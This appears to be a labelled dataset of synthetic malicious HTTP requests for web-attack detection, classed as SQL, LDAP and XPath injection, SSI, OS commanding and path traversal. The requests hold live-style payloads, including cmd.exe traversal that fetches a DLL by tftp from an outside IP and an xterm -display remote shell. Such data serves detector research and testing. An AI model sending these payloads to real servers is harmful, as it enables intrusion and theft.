GET /km56aDoln.mspx?iTclEwsNt0=%3C%21--+++%23include+++++virtual%3D%22c%3A%5Cwinnt%5Csystem.ini%22++--%3E HTTP/1.0
Host: www.pjhfhe.uk:80
Connection: ysoelo0r
Accept: */*;q=0.0
Accept-Encoding: 
Accept-Language: *
Date: Mon, 14 Aug 06 10:55:15 GMT
If-Match: *
Referer: /sk8nedTi/ry7caw/Ou2tn.jpg
User-Agent: Mozilla/5.7 (Windows; U; WinNT 3.3; qi-0e; rv:1.4.3) Gecko/56922606
Transfer-Encoding: identity

null

End - Id: 40684
Start - Id: 35103
class: SqlInjection
GET /isotu8e/0or/ct.pl?o0Bcisphe=%3Bu&Yuwyui=925756&dat5l9l9n=01887&edohetRa=m7ep&roMidnr5a=tbueso&mTheifr=lj6hoYeEOho&rp5cciitwa=003073651&narron=tN8mxECy0&1snh2sgci=dT&auomitm=betweeneee&h7oVQEa2=30467&1ynhd=dcal&tetzen0a=+wa HTTP/1.1
Host: 214.148.73.204:80
Connection: uU2no
Accept: audio/basic, text/*;q=0.5
Accept-Charset: koi8-r;q=0.3
Accept-Encoding: 
Accept-Language: hlheh-fesslR, o-rve8Nlr;q=0.2, gnha-odsln
Cache-Control: pccuTrd=hym5rgse
Client-ip: 186.212.136.62
Cookie: crdtsEinSaoalq=';     insert   into   4nenhfa    values(666,'tikahiu','v4lnar',0xfffff)
Date: Sat, 29 Dec 07 17:06:16 CET
ETag: W/"uXLAnVyI2YO5H0m"
Expect: 100-continue
From: n0irerih@toa3Ih.de
If-Modified-Since: Wed, 15 Jul 09 24:29:39 GMT
If-Unmodified-Since: Fri, 12 Mar 04 23:27:36 CET
If-Match: "BB-K61fJWRYXUnjb8n"
If-None-Match: "5B0egYNwzxawWEd7Q"
If-Range: Wed, 27 May 09 05:06:47 GMT
Max-Forwards: 9836
MIME-Version: 7.7
Pragma: uhq4e='oc'
Proxy-Authorization: 9esniq Uadtnog=kHioniye
Authorization: ti6can dotedeo=e7eioge
Referer: http://ta7r3nl.cz/Nstb5oke/uiejii.gif
TE: trailers,gzip;q=0.8
Trailer: Range
User-Agent: Mozilla/5.9 (X11; U; Solaris 3.3; ss-rf; rv:6.8.6) Gecko/49373754
UA-CPU: Sparc
UA-Disp: 8002,5370,32
UA-Color: color16
Via: FTP/6.5 www.trshde5.jpg, ctri/4.1 108.28.187.68
Transfer-Encoding: gzip
Upgrade: dfI4sw/5.1, ernkl3/0.1, sengI/2.1, s7rr/2.3, 8aLer/5.7
Warning: 088 www.ikdrEas.html "7m4m2tsnwpDd2eb" "Sun, 10 Sep 06 14:00:47 UTC"
X-Serial-Number: 05695967231416
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 35103
Start - Id: 38296
class: LdapInjection
GET /uT.dbj6Um/nuudAeRVo/wzG7nxN7/olsNS1WJ-.swf?pi60eginne7oaBa=%5Dltxmltjhtacceshinaibodyr%25Rttttmp&utmsn=tkemrs1&drntInn=tigellztYnpo&nCqe=eaaIrihtw&Pservicesgroup bybetween_4=mocha9&TrSttaioa=%3Dwedf1psgeeiLuiOOnph-&keavabptcIcshc=Oidjy&@FvfoLY=8760739&Az5fFw.=3505&torraubehsrdxi=c1axv%7Cemd&4tNecpr8suNhnEm=%5Degd8ws&i7uds=63%29%28%26%28objectClass%3DiBe%29%28%7C%28sn++++%3D+Nw%29%28cn%3Dc+++J*%29%29&nLayoptus5rit=sopasswdTncexecvc HTTP/1.0
Host: www.eetvoncr.uk
Connection: close
Accept: image/jpeg
Accept-Charset: iso-8859-4, windows-1258;q=0.0, utf-8;q=0.2, iso-8859-3;q=0.5, windows-1258
Accept-Encoding: *
Accept-Language: l-iehr
Cache-Control: no-transform
Client-ip: 146.107.64.207
Cookie: juys2=fielRns7nEla;K_Z2=hfeat;gmwpenlsh9=jhhtpass>n%;9a04ebilin5p=73529101;odld=3mmuMqY5@
Cookie2: $Version="436"
Date: Mon, 02 Feb 04 20:55:35 CET
ETag: W/"7pB_EDmENlht54k"
Expect: tNAnh
From: deosTn4@ntarwtzGa.ch
If-Modified-Since: Thu, 15 Apr 10 22:22:23 GMT
If-Unmodified-Since: Fri, 20 Jun 08 21:41:19 CET
If-Match: "cA3hYR6DeOuMMRIhctj"
If-None-Match: "6728Pz6ebxoDwB4q"
If-Range: *
Max-Forwards: 58
MIME-Version: 3.2
Pragma: iwraoo='ou0ai'
Proxy-Authorization: Digest username="xipatefi"
Authorization: Basic bWxnSDA6dHRlZWVlaWg=
Range: 6717-,60-,18458-657
Referer: http://4s8dlb.de/lzwSntd.css
TE: trailers,trailers
Trailer: From
User-Agent: lIV7ue http://www.teor.com
UA-CPU: MIPS
UA-Disp: 059,0810,8
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 205x286
Via: HTTP/3.1 www.aheauorh.jpeg, FTP/4.8 191.250.168.128:5384
Transfer-Encoding: gzip
Upgrade: segoo/3.8
Warning: 579 www.htehr.shtml:7460 "fyeYeyiN4nSSEx4" 
X-Forwarded-For: 36.212.4.168
X-Serial-Number: 055236562928
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38296
Start - Id: 43926
class: OsCommanding
GET /scripts/..%5c../winnt/system32/cmd.exe?/c+tftp%20-i%2062.107.47.226%20GET%20cool.dll%20c:\httpodbc.dll HTTP/1.0
Host: 148.133.231.168
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: compress;q=0.9
Accept-Language: e-e;q=0.0, i-cyee;q=0.9, awahie-0iEoa
Cache-Control: no-cache
Client-ip: 22.30.133.135
Cookie: dbejloh=ud.;bxihl=aFmlPB
Cookie2: $Version="32"
Date: Fri, 12 Oct 07 04:12:16 GMT
ETag: "U0d-NWiKRp2IKGFl-JD"
Expect: nweoMudA
From: ri9h6cs@tZrtxhhdgg.be
If-Modified-Since: Sat, 19 Feb 05 05:22:48 UTC
If-Unmodified-Since: Tue, 02 Jan 07 20:21:25 UTC
If-Match: "Hpz7QkwsSHPIH8@F"
If-None-Match: "CnVUCg0eTIW079i"
If-Range: Fri, 11 Jun 04 01:57:49 GMT
Max-Forwards: 1934
MIME-Version: 9.1
Pragma: enlta8='a8fi2M'
Proxy-Authorization: enro elaaRn=qkanorol
Authorization: Digest realm
Range: 6652-,-36477,66590-93
Referer: /oskcseon/0mlsh/7rvulc.conf
TE: gzip;q=0.0,deflate
Trailer: If-None-Match
User-Agent: Mozilla/5.3 (Machintosh; U; PPC 2.6; mc-ir; rv:1.6.3) Gecko/85731352
UA-CPU: StrongARM
UA-Disp: 527,703,32
UA-OS: Win98
UA-Color: color32
UA-Pixels: 428x0275
Via: HTTP/2.4 www.sdGll.gif
Transfer-Encoding: deflate
Upgrade: ezwy/1.5, eqeld/8.1, sddee/2.4, yghane/1.4
Warning: 590 204.118.91.69 "eitd3dnkcep3Sina3" 
X-Forwarded-For: 206.43.118.58
X-Serial-Number: 221610848523557
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 43926
Start - Id: 40907
class: SSI
GET /bWiGt5P5utyisI/p5elhr8smsm/lbSMgyYPd0xzVuGl.htm?tyroirvlqt=32917933&WWselectnodexYLxmlD=%3C%21--+%23odbc+connect%3D%22dndoe%2Cjkimc%2CuiOn%22++++++statement%3D%22select+++*+++++from+lhont%22--%3E&pNmssw=78175&iatii4us9ll2tf=ekfGe&hbJ0iahs0oqm=degto HTTP/1.0
Host: www.wqao.it:80
Connection: saaleoR
Accept: */*;q=0.6
Accept-Charset: *
Accept-Encoding: compress, compress;q=0.3, gzip, compress;q=0.7, deflate;q=0.0
Accept-Language: *;q=0.1
Cache-Control: min-fresh=07
Client-ip: 176.215.222.66
Date: Sun, 06 Jun 04 14:02:19 CET
From: 7tnz7e@rrkue5aod.it
If-Unmodified-Since: Mon, 15 Aug 05 10:20:08 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 479
MIME-Version: 0.0
Pragma: 6='vhs1e3q'
Authorization: Basic eGl1ZTJXaXQ6b2VzZTY=
Range: -813,4-49,-414621
Referer: http://www.rpaohwk.com/re6oDgI/uetttgoa.fgf
TE: deflate;q=0.9
User-Agent: Mozilla/2.1 (Windows; U; Windows NT 1.3; c1-db; rv:3.2.9) Gecko/69757365
UA-CPU: MIPS
UA-OS: FreeBSD
Via: 8.4 www.tigb.jpg, 0.6 24.248.244.10, 6.3 185.81.202.212
Transfer-Encoding: 8ftqr; t31Y6su=9nrsrhy
Warning: 086 61.20.174.151 "hej5T2phoa6l2adseC1t" 
X-Serial-Number: 163741114628927

null

End - Id: 40907
Start - Id: 43692
class: OsCommanding
GET ..�../..�../mssql7/install/pubtext.bat" & dir c: .exe? HTTP/1.1
Host: www.aV8gja.org
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.5
Accept-Encoding: gzip;q=0.6, compress, compress, compress;q=0.3
Accept-Language: *
Cache-Control: max-age=0879
Client-ip: 224.58.43.189
Cookie: 7sh=yiItn;soUataenms=auh0f(linkulzc';Nos=5729338;Ttpto=1566;majhaseme=A execn5;hE13tFere=3428
Cookie2: $Version="87"
Date: Tue, 23 Feb 10 12:40:15 GMT
ETag: W/"WMto0qelCuiE_uQV1"
Expect: 100-continue
From: o68nO@tetn70i.cz
If-Modified-Since: Tue, 19 Sep 06 17:53:15 CET
If-Unmodified-Since: Fri, 07 Mar 08 02:06:50 CET
If-Match: "mJJG3z@q5TiwxT8jCP@"
If-None-Match: "L6PRZ9JqVZTekuICg"
If-Range: "Q2gRfeoVn9h94TAk2mu"
Max-Forwards: 474
MIME-Version: 8.9
Pragma: no-cache
Proxy-Authorization: csat8 fle0=tohc
Authorization: Digest algorithm=MD5
Range: 0932-655,7-822597,-7
Referer: /eleeg/ommec8s/hhl2itd.php
TE: trailers,deflate;q=0.7
User-Agent: rndsuehcyhvasoeArAeE
UA-CPU: StrongARM
UA-Disp: 911,720,8
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 827x275
Via: 6.3 72.169.10.81:1, stlo/3.5 50.86.7.132:944, FTP/1.8 www.ytddYOt.tiff
Transfer-Encoding: identity
Upgrade: as8/8.8, mad/2.6, pEyuj/1.9, o5a8/8.7, ewmi2m/5.2
Warning: 965 www.lhcrhue2.jpeg "khnjidedehslccnwsp" "Tue, 25 Jan 05 20:48:31 UTC"
X-Forwarded-For: 51.55.191.62
X-Serial-Number: 181822248668347
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 43692
Start - Id: 38423
class: LdapInjection
GET /aZ54Zhjr/93Jtim2m/J8joiyetyhn/yCeNmochapXH@DF3r/tosse63ar0tewaohnbg/dStNJOmailTjbdchild/FvJ3v-BGEo/nd@RWuGOJ0MKjMmYtU.w.mspx?zersstkiGoetetR=97416378&m1e=c%7Ei&in=iYRUi&rtiawll=7_PHVe&7t=eSeobttnemetth&tn40s0msl=Uorr%3Be%3BbahI51n4p%5Ct&veuhq3ya=trees%29%28%26%28objectClass+++%3D+ot*%29&oeu=gWH2q_jx&nanufhi=alltperlle&mvsvshnRus=eiae5+copyae&isoEeagIuna=eaiiseT6seetea&igmdbihue=068&sciub=604&lmshhaGe=oFUVK&jljsaIydneb=u8TofQ HTTP/1.1
Host: www.3wT7.fr:80
Connection: close
Accept: image/*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: pastere-4omA;q=0.7, ra-iamjeee7, suiwG8Ud-e3es;q=0.4, aftbe2Mt-mamaezii;q=0.7
Cache-Control: only-if-cached
Client-ip: 169.13.143.24
Cookie: miiu1ealeehl=rFrecrp;afi=cchildi77ili;nPolBhS=e9sAhr;Ireplace-WgxmlhttpF_=82068;iheos=ot ;GSdJnevalsc=nSal
Cookie2: $Version="88"
Date: Tue, 23 Oct 07 02:57:29 UTC
ETag: W/"Nuh8aaig2MhWGggs"
Expect: 100-continue
From: oe81he@eaf2e.st
If-Modified-Since: Fri, 31 Jul 09 23:37:31 CET
If-Unmodified-Since: Tue, 28 Sep 04 24:07:01 GMT
If-Match: *
If-None-Match: *
If-Range: Thu, 27 Dec 07 13:36:21 UTC
Max-Forwards: 71
MIME-Version: 2.2
Pragma: l=Eee
Proxy-Authorization: Digest cnonce="twseli3"
Authorization: Digest nonce
Range: 609-
Referer: http://g6myi.de/to2c/dnn7txa/rifmis0.jsp
TE: trailers,trailers
Trailer: Transfer-Encoding
User-Agent: tniaet (a2fd5um_eu)
UA-CPU: x86
UA-Disp: 185,8388,8
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 0696x1408
Via: 2.6 1.116.253.158, HTTP/3.8 www.epxaNoh.html:625
Transfer-Encoding: deflate
Upgrade: lig/4.2, roeri/4.4
Warning: 498 www.qbdd.css:76 "iEsitooO9Eeo" "Mon, 07 Mar 05 03:32:44 UTC"
X-Forwarded-For: 180.11.72.245
X-Serial-Number: 8565701730547644653
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38423
Start - Id: 49484
class: XPathInjection
GET /netcatVjMS3Q9mbaccept/c96/zgnp5Wsm7t/kRcan3caacedxnt/tepreooIYveonsft/nbiNrfrhiswng.jsp?ftuelwye=858&waynaoIh=94&cegeOlSe=i%408maee1s&iw=ices&2hn6tediitq=nafIhNDOjnJ&tsmilutoea=eyeRf%2FEokern%2F1Qe%2Fchild%3A%3Anode%28%29%5B++++position%28%29%3D2%5D++++%7C+o%2Flqoh%2FaE%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D8%5D+++or+++%27i94edwe%27++++%3D+%27&taFuo1=ewaTidnno&e1sdtdhcces=s&ecFcAwaTeah=j%25ediv%5B&dedh8s1ue=itxUisnenet1b6bp&MTKg=ztcZ&nneuilbet8=705&8i7Fcq=8959607&5ZZyAlsdrops=d HTTP/1.1
Host: 127.46.122.115
Connection: keep-alive
Accept: */*;q=0.7
Accept-Charset: windows-874, iso-8859-8;q=0.6, cp-950;q=0.6, iso-2022-kr;q=0.8, cp-932
Accept-Encoding: *
Accept-Language: *
Cache-Control: min-fresh=0
Client-ip: 246.26.86.133
Cookie: ee4=3;UYa4DUekur1=421204255;etnHole3uoemo=27206546
Cookie2: $Version="3"
Date: Wed, 12 Aug 09 05:05:48 CET
ETag: W/"8WDs@-d9IdX423MDOwo"
Expect: 100-continue
From: H4ft@ataqsdls.net
If-Modified-Since: Wed, 27 Jun 07 19:14:08 GMT
If-Unmodified-Since: Tue, 03 Oct 06 09:52:11 UTC
If-Match: *
If-None-Match: *
If-Range: Wed, 30 Jul 08 09:29:41 GMT
Max-Forwards: 999
MIME-Version: 2.1
Pragma: das2eea='eht'
Proxy-Authorization: Digest cnonce="isagrr"
Authorization: Digest uri=http://www.n4umi.ch/eegig8h.swf
Range: -012
Referer: /yiAi9sh8/sneel4nE/ysbdhdnc/dhoe.sh
TE: gzip,chunked;q=0.5
Trailer: Authorization
User-Agent: Mozilla/3.7 (Machintosh; U; PPC Mac OS X 6.1; tr-ia; rv:0.2.0) Gecko/43519798
UA-CPU: Sparc
UA-Disp: 4263,349,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 527x1451
Via: FTP/6.6 221.185.154.74, HTTP/2.7 46.208.240.221
Transfer-Encoding: compress
Upgrade: n7e/3.5, tspSaa/1.0, aveuwt/9.7
Warning: 607 37.136.158.28 "s5ntidssyngee" "Wed, 07 Sep 05 11:09:31 UTC"
X-Forwarded-For: 206.176.73.188
X-Serial-Number: 201583507
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49484
Start - Id: 43987
class: OsCommanding
GET /_vti_bin/%2e%2e%2f%2e%2e/%2e%2e%2f%2e%2e/%2e%2e%2f%2e%2e/winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: www.3nHrita.fr
Connection: close
Accept: */*;q=0.8
Accept-Charset: windows-1253;q=0.9, iso-8859-1, isiri-3342;q=0.0, x-mac-greek, windows-1250
Accept-Encoding: 
Accept-Language: *;q=0.1
Cache-Control: no-transform
Client-ip: 60.172.21.158
Cookie: lictMeO=ns 
Cookie2: $Version="60"
Date: Sun, 22 Feb 09 01:39:51 CET
ETag: "eWaaxQ@0tex2f3f4WX"
Expect: 100-continue
From: 44fa@mshrPyo.gov
If-Modified-Since: Wed, 10 Jun 09 21:13:12 CET
If-Unmodified-Since: Sun, 27 Jun 04 21:50:31 CET
If-Match: "0HCku5I6FQGDVvH"
If-None-Match: "uY20zzYkeH0twEb"
If-Range: "xP75Aa9058Vh6nUsJeL"
Max-Forwards: 37
MIME-Version: 9.9
Pragma: remcbotW='r'
Proxy-Authorization: Qyeeu qzNllaee=zsachi
Authorization: Digest nc=0def329E
Range: -2,795-,-91
Referer: http://www.e97t.com/r0eio9.mdb
TE: trailers
Trailer: Referer
User-Agent: Mozilla/8.8 (Windows; U; Win98 5.3; Nt-as; rv:7.3.9) Gecko/08817373
UA-CPU: x86
UA-Disp: 402,257,32
UA-OS: Win98
UA-Color: color8
UA-Pixels: 5667x180
Via: 5.5 68.98.66.251, 2.3 www.ouisohz3.jpg
Transfer-Encoding: identity
Upgrade: dsss/1.1, o8rt/7.8, 7ln/9.8
Warning: 170 126.27.186.211 "do3kdsikezlS" "Fri, 29 May 09 15:50:00 UTC"
X-Forwarded-For: 67.28.144.149
X-Serial-Number: 1714241
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43987
Start - Id: 37944
class: LdapInjection
GET /3GF9n@ZsuSUMLR.mspx?piaoacsnrita=xpmanT8z2c2t5oedbI&eaUojI=556412&uieB3e=28&ihrA5dertbnbd=%29&g29rZn4i7gta=%29+%28%7C%28z3%3Dto*%29&es=h1PEUSMEFIL&Bv1l1rb=dkdocument&tyuirjtearGota=bgsound%40ef%3Cfdiecuihomebshutdownqgroup+bye HTTP/1.1
Host: 202.106.201.237
Connection: ehnymr
Accept: text/plain;q=0.5, text/*;q=0.8
Accept-Charset: *
Accept-Encoding: 
Accept-Language: aooe9a3e-i8hersy3;q=0.2, hnp-eyried, daeider-9fsec9gn, ttd-o2xaar3t;q=0.6, nr-ou;q=0.4
Cache-Control: max-stale
Client-ip: 123.126.49.207
Cookie: sexaxC7bt=dA Tc;hOetqew=174164
Cookie2: $Version="513"
Date: Tue, 05 Jul 05 08:57:07 GMT
ETag: "3zpt6.sWVxOYSXK"
Expect: 0ignSd=o0nsnoi
From: p2udarel@zentnnsmu.org
If-Modified-Since: Fri, 09 Dec 05 02:18:50 UTC
If-Unmodified-Since: Mon, 08 Aug 05 19:09:59 UTC
If-Match: *
If-None-Match: "50JG9_b25xdD8wTN2U"
If-Range: "Rac18572haXkQj6nt-hB"
Max-Forwards: 70
MIME-Version: 3.4
Pragma: 6=dRt
Proxy-Authorization: Digest cnonce="aEoaal"
Authorization: hcdMp olout=settnn
Range: 504-,69-,78804-
Referer: /slblt4.swf
TE: trailers,trailers
Trailer: Accept-Language
User-Agent: Mozilla/3.3 (Machintosh; U; PPC Mac OS X 5.8; ik-nn; rv:0.2.5) Gecko/72274770
UA-CPU: 68000
UA-Disp: 472,2226,8
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 8848x2681
Via: 6.8 www.eia6hEei.jpg, FTP/1.9 251.221.152.201, 7.3 169.244.76.129
Transfer-Encoding: gzip
Upgrade: spoM3/2.4, sus/6.4, cez/4.2
Warning: 209 www.aRtos.png "mgfiafudiih" 
X-Forwarded-For: 143.12.94.194
X-Serial-Number: 8812591
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37944
Start - Id: 37008
class: LdapInjection
GET /rOG/ONZphpgroYmt/snzoeabetshnnh3pei/BPW6@childo2jV7R/evdV/d@8IvbM9YAHX@bjpA8Q@/UOtHtiXprocessing-instructionDDEX/Mi/UaWbbxterm@EA16kinputu/jeforuedaarm1.jpg?Dce4pU4eUs83n=Eeot&PgJHV=%29++%28+%7C%28displayName%3Dhad*%29+%28name%3D+++had*+++%29%28++++mail%3Dhad*++%29&mz9nrw=o&neu=aoNksEo&oc1ngs=ufc&tuheTnsv=xow6bhiid&hmNr=v-tso+fhcoCcaTw&htpassRXYT3=w6eceietsl HTTP/1.0
Host: 54.90.165.42
Connection: keep-alive
Accept: application/*, image/jpeg, audio/*
Accept-Charset: *;q=0.7
Accept-Encoding: 
Accept-Language: sFonEb-rgehHntr;q=0.6, onllyOse-ehceao;q=0.7, oplprasj-Ec;q=0.3, eeoe-oRqms, gt-twte;q=0.0
Cache-Control: only-if-cached
Client-ip: 134.238.253.203
Cookie: 6ae=46407;te1io5301IorE=nfftp;rqauin=91742;eot8irw=5265145;ysthuoeoi=|5;urnt=14
Cookie2: $Version="554"
Date: Sun, 20 Jul 08 11:43:46 GMT
ETag: "wRhCcv9Re9WpU6WH86K1"
Expect: 100-continue
From: ullaa@pmrm.cz
If-Modified-Since: Sun, 20 Jan 08 11:01:09 GMT
If-Unmodified-Since: Wed, 26 Nov 08 06:19:05 GMT
If-Match: "zFOJ.NrHrc-sNXWN_W2d"
If-None-Match: "ToxdwizwbQJF.UzWqV"
If-Range: Sat, 27 Sep 08 17:09:04 GMT
Max-Forwards: 755
MIME-Version: 6.2
Pragma: gemy='ha'
Proxy-Authorization: NTLM bjhjeWN6aXRhb2VyY2VzcnBvOXloU2Y1dnJsdGhsNnRyOG5pb2N4TE4=
Authorization: NTLM cGxyT25vaHU2OWFtc2ppaThodDdqWW1oekNjbHdlUmFlc2JlYWZlU2V0WWV0
Range: 11-,-9658
Referer: /a0ltem.nsf
TE: gzip;q=0.0
Trailer: Cache-Control
User-Agent: Mozilla/3.7 (Machintosh; U; PPC Mac OS X 6.2; ig-pg; rv:5.8.5) Gecko/91623469
UA-CPU: PowerPC
UA-Disp: 720,086,32
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 8274x205
Via: oTSxty/6.0 99.132.203.176, dIslI/6.3 168.220.250.97:278, FTP/1.0 127.41.98.70:15440
Transfer-Encoding: 2ril2; eaqc=nanho
Upgrade: dho/9.5, 3oax/1.9
Warning: 992 www.dyteeg.tiff "riPlyr" 
X-Forwarded-For: 164.143.217.25
X-Serial-Number: 4092233930
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37008
Start - Id: 41266
class: SqlInjection
GET /oteai/Lhtacces7/nenW/pHlnmskts05UDbahubeo/tcYCfH4j4q5_RJwOi/dZkmlbfBr20h37/rF0jQIXV2JPcmJQ/pLMC1JwlNqaDu/Deeeimts/D6UAjKK/hUwY4W.tiff?etd5q=luHQcW5wYiK&MofxtolOw=kmN1vg-lE3&eA4FkeOvks=Uho0dohdsn6ebil-&rr=nph-&ardn=fz6WLPzqV&4oU6Lsamuw_8ta=%2FsHaxtermhavingT-ge9ha+usraphli HTTP/1.0
Host: 65.148.87.115
Connection: keep-alive
Accept: application/rtf, image/png;q=0.1
Accept-Charset: *
Accept-Encoding: 
Accept-Language: tspa0iiM-mr;q=0.7
Cache-Control: no-cache
Client-ip: 129.234.186.132
Cookie: mnstttnodno=chairs'   UNION SELECT     nr     FROM    dba_users  WHERE name     like   '%25
Cookie2: $Version="714"
Date: Tue, 27 Jan 04 22:56:01 GMT
ETag: "9Vbcj1k4fgBHFBN62"
Expect: thttrse=stHh5s;omaiae
From: sadkb6h@raise.cz
If-Modified-Since: Thu, 25 Jan 07 23:46:30 CET
If-Unmodified-Since: Sun, 30 Jul 06 04:30:35 UTC
If-Match: "euWh6pi8tm-epKIKSm"
If-None-Match: "buP_y3FE4cCs-O64"
If-Range: Sun, 02 May 10 02:38:52 GMT
Max-Forwards: 212
MIME-Version: 3.5
Pragma: no-cache
Proxy-Authorization: Digest username="htctmgeT"
Authorization: Digest realm
Range: -78675,-73,41-
Referer: /jslgls/edeinE2i/hoNxfyw/ogsqoaf/aqe6Dtn.php3
TE: trailers,trailers,chunked
Trailer: Max-Forwards
User-Agent: Mozilla/9.1 (Windows; U; Win98 3.0; ob-dd; rv:0.4.0) Gecko/18398487
UA-OS: Win9x
UA-Pixels: 557x1445
Via: FTP/2.4 www.ifxa1qE.jpeg, 4.1 www.hovT6le.png
Transfer-Encoding: deflate
Upgrade: iyhnr/0.0, awhact/3.4, e1delp/1.8, 3goK/3.2, deeso/8.6
Warning: 498 21.33.208.241 "hoInidscriwhfxr" "Wed, 09 Dec 09 01:18:48 CET"
X-Forwarded-For: 31.90.227.178
X-Serial-Number: 2028120
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41266
Start - Id: 44296
class: OsCommanding
GET /scripts/%2e%2e%2f%2e%2e/%2e%2e%2f%2e%2e/%2e%2e%2f%2e%2e/winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: 51.103.68.131:7
Connection: rOoi8mi
Accept: audio/*
Accept-Charset: *;q=0.0
Accept-Encoding: compress, deflate
Accept-Language: rO-ckEteasg, a-egoesEd
Cache-Control: no-cache
Client-ip: 86.249.82.37
Cookie: uiao=v:t;b9adtisiucnhSda=NtllargineEaha;ifbt=vr665oenrtneoYmt;eameb0ende=autoexecall;qvaPij=s o5a
Cookie2: $Version="583"
Date: Wed, 24 Jan 07 16:37:27 UTC
ETag: "Lnj8pag@wO5.tvVMS@g"
Expect: 100-continue
From: l1Bt7@hnsv2sT9.net
If-Modified-Since: Mon, 26 Jul 04 09:17:10 CET
If-Unmodified-Since: Sun, 27 Sep 09 07:31:09 GMT
If-Match: *
If-None-Match: *
If-Range: "PnObIr1--fPNEcLS0iL"
Max-Forwards: 6719
MIME-Version: 6.6
Pragma: no-cache
Proxy-Authorization: NTLM b1dmc2ZsdHh6cmV0d2F0dDlsYmlkYWhpc2lrcW5kYWFlOHJ1Zw==
Authorization: wnaeh oheL=ooeioN
Range: 3-
Referer: http://Yheci.net/afuvh/ysbtea/lbt8.css
TE: chunked,trailers,trailers
Trailer: If-Match
User-Agent: uniije (nVTVVMmhd)
UA-CPU: PowerPC
UA-Disp: 9070,4804,16
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 6071x5916
Via: Tei8/8.8 205.87.46.2
Transfer-Encoding: gzip
Upgrade: Aers/1.0, riij1i/9.6
Warning: 525 251.120.159.217 "ay2yetttoyyhQsouLs" 
X-Forwarded-For: 81.125.200.90
X-Serial-Number: 7359375071
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44296
Start - Id: 36715
class: OsCommanding
GET /ivJ8opu--nHdRM/jsusr1yoa8.asp?kacef8noteAerae=cqWQC&iriojb=222850&dos=9821483624&1DEK=t&fIrnhfao6q3=254&eCtbstrregt=+negHn%7Canph-sft&lmstur=1unyhtrr2aiPs6s&yt6pr=adsslmreewhmnunetcat++mhttpsi&dGenwdtCehfat=e9nadeyortC&drb8ehdupt=ssIeNg&feosv=c%3Frti7wto7eElm&temst5tweSsa=142107&tt3m=%5Cr+++xterm++++-display++136.238.149.119%3A0.0&46tiyrcc7eume=22 HTTP/1.0
Host: www.daetihec.it:2
Connection: close
Accept: */*
Accept-Charset: *;q=0.2
Accept-Encoding: 
Accept-Language: *
Cache-Control: ndItonjy=6uf
Cookie: linkrcpWSjTrsystem=Apiyetco;fZwgetYLehWA=r2Utu;hyKe=d2ji;tftttlrptnea=419893013;pLh=st3
Date: Sat, 24 Dec 05 02:48:54 CET
ETag: "l9Gy9HkIv8mHHdYDo6E"
Expect: gcde
From: reotU@rhzuEsnere.it
If-Modified-Since: Sun, 12 Jul 09 11:03:59 GMT
If-Unmodified-Since: Wed, 10 Aug 05 06:21:32 GMT
If-Match: "iVFml@WnD9Z0eePYb"
If-Range: Fri, 28 Aug 09 15:43:19 CET
Max-Forwards: 7
Pragma: no-cache
Authorization: fsimhs oedsio=7eRjsxzv
Range: 563-2,585502-,9-74
Referer: http://hOaiGste.gov/tfwedn/eoanpB/dt8rl8rf/echfs.exe
TE: deflate,gzip;q=0.2
User-Agent: Mozilla/5.2 (compatible; MSIE 0.1; Mac OS X; Pnhmtiaa)
Transfer-Encoding: 45a7
X-Forwarded-For: 18.24.168.27

null

End - Id: 36715
Start - Id: 45496
class: PathTransversal
GET /battoneshtisy4dut/7iamuRhr/child@RSwp-c-SZfaKc/tma5x7rlaPor2dd/ne.N8/EcUrt1/t5xkDZFTsn@uJ@/sebMiAoCTwp/giT4Nn1X70A/nnTSt/e@Mf@rzrM/hh5.css?uauAtlhsntadn=rr&nve4ti5h4sEe5j=3&l4=0mSseotrug&llsonenEs3all=eLbjmjyaVS0&qe=678&cNnyHidhtsFe=fhpemee&_1QbetweenaOALiframefR=..%5C..%5C..%5C..%5CWINNT%5Csystem.ini&ienyDdaiIserknr=oLtbcD0ssasaoajphpxhttp HTTP/1.1
Host: www.e1ho.it
Connection: close
Accept: application/*
Accept-Charset: *
Accept-Encoding: *;q=0.3
Accept-Language: *;q=0.4
Cache-Control: no-store
Client-ip: 165.251.254.128
Cookie: rmTesatztRg5Eo=76916
Cookie2: $Version="629"
Date: Wed, 02 Feb 05 04:09:38 GMT
ETag: "SQQiLGzppLASCU-m"
Expect: shtTeapd=s0or6;ewio3=nsoo
From: rddIbt@n7reian.st
If-Modified-Since: Mon, 21 Mar 05 05:10:53 GMT
If-Unmodified-Since: Wed, 30 Nov 05 01:59:32 GMT
If-Match: *
If-None-Match: *
If-Range: "WJuNZph3I_LEhQN8"
Max-Forwards: 37
MIME-Version: 4.8
Pragma: zh9taj=dtv
